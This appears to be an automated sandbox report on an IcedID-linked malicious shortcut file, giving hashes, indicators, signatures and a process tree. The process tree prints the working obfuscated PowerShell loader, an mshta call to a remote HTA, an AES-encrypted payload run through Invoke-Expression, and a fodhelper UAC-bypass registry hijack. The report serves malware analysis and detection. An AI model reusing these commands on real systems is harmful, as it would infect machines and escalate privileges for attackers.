Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 12:24
Static task
static1
Behavioral task
behavioral1
Sample
54267-876-8676.lnk
Resource
win7-20220414-en
General
-
Target
54267-876-8676.lnk
-
Size
2KB
-
MD5
9edabe11d846a6de5d337e737d24e85c
-
SHA1
26f63aac40c4e9f459a379eec94a258b604f582e
-
SHA256
4b582f38e3376346cb066e36ff8dfa32b268154bb2de13870702e8bbf366a023
-
SHA512
5e88d418cb26f4bfd7bf5d1b2dbf31a8f026bbf29c760919d2986c883de6067df75c5eb8ca790a2c4a7ef09b87a2c6ba1b62e57e76fc3b32af633317639c6f0e
Malware Config
Extracted
https://modhub.com.br/upload.hta
Extracted
icedid
109932505
ilekvoyn.com
Signatures
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 7 IoCs
Processes:
mshta.exepowershell.exeRundll32.exeflow pid process 5 5012 mshta.exe 6 5012 mshta.exe 8 5012 mshta.exe 10 5012 mshta.exe 12 1264 powershell.exe 13 1264 powershell.exe 70 3252 Rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
Rundll32.exepid process 3252 Rundll32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7b1931ba-c4f4-4fa7-9e4f-6f6adc2af7ab.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220524122518.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 11 IoCs
Processes:
powershell.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lxpwR.bat" powershell.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exepowershell.exemsedge.exemsedge.exepowershell.exeidentity_helper.exeRundll32.exemsedge.exepid process 4300 powershell.exe 4300 powershell.exe 1264 powershell.exe 1264 powershell.exe 3684 msedge.exe 3684 msedge.exe 1544 msedge.exe 1544 msedge.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 2996 identity_helper.exe 2996 identity_helper.exe 3252 Rundll32.exe 3252 Rundll32.exe 5108 msedge.exe 5108 msedge.exe 5108 msedge.exe 5108 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
msedge.exepid process 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4300 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeIncreaseQuotaPrivilege 3200 powershell.exe Token: SeSecurityPrivilege 3200 powershell.exe Token: SeTakeOwnershipPrivilege 3200 powershell.exe Token: SeLoadDriverPrivilege 3200 powershell.exe Token: SeSystemProfilePrivilege 3200 powershell.exe Token: SeSystemtimePrivilege 3200 powershell.exe Token: SeProfSingleProcessPrivilege 3200 powershell.exe Token: SeIncBasePriorityPrivilege 3200 powershell.exe Token: SeCreatePagefilePrivilege 3200 powershell.exe Token: SeBackupPrivilege 3200 powershell.exe Token: SeRestorePrivilege 3200 powershell.exe Token: SeShutdownPrivilege 3200 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeSystemEnvironmentPrivilege 3200 powershell.exe Token: SeRemoteShutdownPrivilege 3200 powershell.exe Token: SeUndockPrivilege 3200 powershell.exe Token: SeManageVolumePrivilege 3200 powershell.exe Token: 33 3200 powershell.exe Token: 34 3200 powershell.exe Token: 35 3200 powershell.exe Token: 36 3200 powershell.exe Token: SeIncreaseQuotaPrivilege 3200 powershell.exe Token: SeSecurityPrivilege 3200 powershell.exe Token: SeTakeOwnershipPrivilege 3200 powershell.exe Token: SeLoadDriverPrivilege 3200 powershell.exe Token: SeSystemProfilePrivilege 3200 powershell.exe Token: SeSystemtimePrivilege 3200 powershell.exe Token: SeProfSingleProcessPrivilege 3200 powershell.exe Token: SeIncBasePriorityPrivilege 3200 powershell.exe Token: SeCreatePagefilePrivilege 3200 powershell.exe Token: SeBackupPrivilege 3200 powershell.exe Token: SeRestorePrivilege 3200 powershell.exe Token: SeShutdownPrivilege 3200 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeSystemEnvironmentPrivilege 3200 powershell.exe Token: SeRemoteShutdownPrivilege 3200 powershell.exe Token: SeUndockPrivilege 3200 powershell.exe Token: SeManageVolumePrivilege 3200 powershell.exe Token: 33 3200 powershell.exe Token: 34 3200 powershell.exe Token: 35 3200 powershell.exe Token: 36 3200 powershell.exe Token: SeIncreaseQuotaPrivilege 3200 powershell.exe Token: SeSecurityPrivilege 3200 powershell.exe Token: SeTakeOwnershipPrivilege 3200 powershell.exe Token: SeLoadDriverPrivilege 3200 powershell.exe Token: SeSystemProfilePrivilege 3200 powershell.exe Token: SeSystemtimePrivilege 3200 powershell.exe Token: SeProfSingleProcessPrivilege 3200 powershell.exe Token: SeIncBasePriorityPrivilege 3200 powershell.exe Token: SeCreatePagefilePrivilege 3200 powershell.exe Token: SeBackupPrivilege 3200 powershell.exe Token: SeRestorePrivilege 3200 powershell.exe Token: SeShutdownPrivilege 3200 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeSystemEnvironmentPrivilege 3200 powershell.exe Token: SeRemoteShutdownPrivilege 3200 powershell.exe Token: SeUndockPrivilege 3200 powershell.exe Token: SeManageVolumePrivilege 3200 powershell.exe Token: 33 3200 powershell.exe Token: 34 3200 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msedge.exeRundll32.exepid process 1544 msedge.exe 1544 msedge.exe 3252 Rundll32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exemshta.exepowershell.exemsedge.exedescription pid process target process PID 4476 wrote to memory of 4300 4476 cmd.exe powershell.exe PID 4476 wrote to memory of 4300 4476 cmd.exe powershell.exe PID 4300 wrote to memory of 5012 4300 powershell.exe mshta.exe PID 4300 wrote to memory of 5012 4300 powershell.exe mshta.exe PID 5012 wrote to memory of 1264 5012 mshta.exe powershell.exe PID 5012 wrote to memory of 1264 5012 mshta.exe powershell.exe PID 1264 wrote to memory of 1544 1264 powershell.exe msedge.exe PID 1264 wrote to memory of 1544 1264 powershell.exe msedge.exe PID 1544 wrote to memory of 1452 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 1452 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3792 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3684 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 3684 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe PID 1544 wrote to memory of 4432 1544 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\54267-876-8676.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#~@+uvOSgQ:Z#>$tEIiiZsclbDp=@(96580,96586,96575,96587,96568,96503,96575,96587,96587,96583,96586,96529,96518,96518,96580,96582,96571,96575,96588,96569,96517,96570,96582,96580,96517,96569,96585,96518,96588,96583,96579,96582,96568,96571,96517,96575,96587,96568);<#~@+uvOSgQ:Z#>$IMvbvbxLdUneQIhgXc=@(96544,96540,96559);<#~@+uvOSgQ:Z#>function xqvxwsJeK($LmLHgHafCwGhrN){$iSqvUTYMYOTHbW=96471;<#~@+uvOSgQ:Z#>$izdBrBghcDulg=$Null;foreach($eEFlcMD in $LmLHgHafCwGhrN){$izdBrBghcDulg+=[char]($eEFlcMD-$iSqvUTYMYOTHbW)};return $izdBrBghcDulg};sal UJNjnKJgNJogU (xqvxwsJeK $IMvbvbxLdUneQIhgXc);<#~@+uvOSgQ:Z#>UJNjnKJgNJogU((xqvxwsJeK $tEIiiZsclbDp));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://modhub.com.br/upload.hta3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $UGJgEhmuQd = 'AAAAAAAAAAAAAAAAAAAAAEC4K2DdresXc6AuVXsd0sBMIPMLxigD6xskYu+Lw5bOrzOSEka0gQxVcfYajOu4HND2313+fKcSfjtnuOp/4Q/ZvXzpHyzZ3GF8nvfohlG/ekwbiL4vGZGfTK7PsCRfvoGwvuAZzVvbbKoE/ieHgzb0oFDE3Lqdi5GwDBxVCwP6fxjB0i5vnrEUmlvjHqEJ/sekccu0plvcxZA4Snn3BYb5X73LsQg2FioZZhzj+v64UbpgP/BWsThQx0DNYa4DDES86WmjIR/wy2nG9vch69HuUjylq68+JYsCAj4H3bwpGlaVJq+GsfxBK6aAfdNvim9ruE1xZEOIqC0I6C98fGJNDnRWyRlRVsfZWVaBehhHGNejwLiW7V0DeRnc1Y9S5zCRTdvcyLOgJLLDkouqzsA3sSMJI8ya7/yO9gCR4dbTSMyK8ULZQFtNKSMmy3/VfoEjPJecTN/EnKPVXs/XnSe9MjHjC+1Xhqh4VQYbkzffXQ8+lyp0ZmP+9DtyFIWMdM6cM9DduzlD3L0t7WImsFZxA7ynlkbN+EWWEja6q3ZNBk6BmNgWXiSXt0mxLhUmcO/oh8jdMRpdY6Br31X6GFx4OX0mdlGEtxC5ujrdvSUfRXr02nob2ZYcmGNlP0xFOd0fH9Y94DQIbJgn1PJazJ2IgZlkfNSq78rgX4Awpfla76IKcb+IbkpqbmT7whA6hkoVXBJuUIusHlOf4eKgxy5ZY0PUaIQdV5AquY5ieImU5/LKm9q6r6FUxy7GXOO1/YWgr59/oFEQULdMY6qhTag878XtQVAXAmWFX6JbQYuqJOHiaOCwB+EqLu0ownBhztSx00kmdZ4vrwcv1ADZmwFGTSa2lebgRdc6M8UucywiwBMKleqqhCX9j9RWIydLnLNj6uGH0P1G1PgzWdC0H6O0kihci6sgjYT8oCT3+rs+poKZAl7ykWSisMpuOssUH/wc68QG3le7vgXqkZMkv64czHherSheGM449+jHNUFNM1xr365mZjmclzxOBAS98jNeWuavXubEYfP8NSXBl2/soTT1A/hHKgpnvC6WEe+0SkSJ4dMSZ7Df6aE7iBafEr16+5znJcfPeI3x/zJTjyDfuVwFFnof2Ah2LEMCaJniFKPTO2/b5kzobr+0tWWkSxaenpP0kvoZz5evxRQSxEyOVN9HFuJ6KnfeWgA9HDJ+JQlH+H/hC/7rzMTvsv17LGlk1x/PM4FRwiSD4hwY8VZ9pyquyy6H9a7o63UUE0KGoYGYrpl/SsN9R3VAN0b3uBF+ZR9F77Mz6J/+TJYvtfOVvq6LKAth7Ywbsh0VNJvf6Ea6Frg3P0+aGIs/vEWgLGhicAQ8UazUWgsAC4FEEiIFOPDScCRTa6RW6+fZXr38W5idu6FSg/kWweIsECQHXqNPH4vw4u/W7XsiIiVCKM0RhNtUvB0slBc44DZJxPbYIvR1CjiNrauFDrCn0iQirQL/Et8cduBRhh7I7Z24l/HcQulvcguCvAgeA476esOCTSj8m0vXf0bNvDZfC7crZg1yZRAsf4VCzfsgFFk3TLhXT0sqa1u1PLK3ZDYpbvn238AXY3pmuCEhwk7HzO3ZdkhJqtwBBYtCTtAO4FIJxYN74njDb79m5PXpkKx+DyKl1YuauszMmt3DxMNN0Es9Y601rkmrV/Qa+w+PA01zmLuFMIFeT+/xPTEdwC1uIlH99EjvnQcej9YccVJ37uq5GhBYYC8M4B5prvV0t2/mstmwKftk5p02TrnAAIBQGR1W6Wplhyx/bY1t6WbF/5mzu9XFZdvk7W6VJBFlKB4VgnKyhhBhb10ahzu0c1eZaEvVoTxvx0qBvnJU8HrwaQm8Ef47ezD4kep7Z/l9T1n/7bskquu2sYcYo81UF1cXQUts3KkjO/+8SOKWImug0oNR5PR0PMPHtSSsLLBwYgkUm1wfNHvGjbJl0xY4AbxxwAcX/8L5TFvKaVrDp8B6BMddExC+LVcM5VhzI3nseEdfDZ78c6h7CyFN7pnSRmUO+6+F1e+UOafgV8yv+igNzvw6OZ8Qcga8s09v94L/2M6vZzCZ42VAPGJjCMcZS+4h6QlD';$WKVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-Object 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbHgtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System.Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbHgtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkTOHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgtfJ.Dispose();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRio );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-Object System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode]::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close();$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZiPscSF)4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\DeepL_Logo_darkBlue_v2.svg5⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa063d46f8,0x7ffa063d4708,0x7ffa063d47186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5520 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4028 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings6⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff797c35460,0x7ff797c35470,0x7ff797c354807⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4104 /prefetch:26⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1984 /prefetch:86⤵
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lxpwR.bat" "6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\lxpwR.bat" *7⤵
-
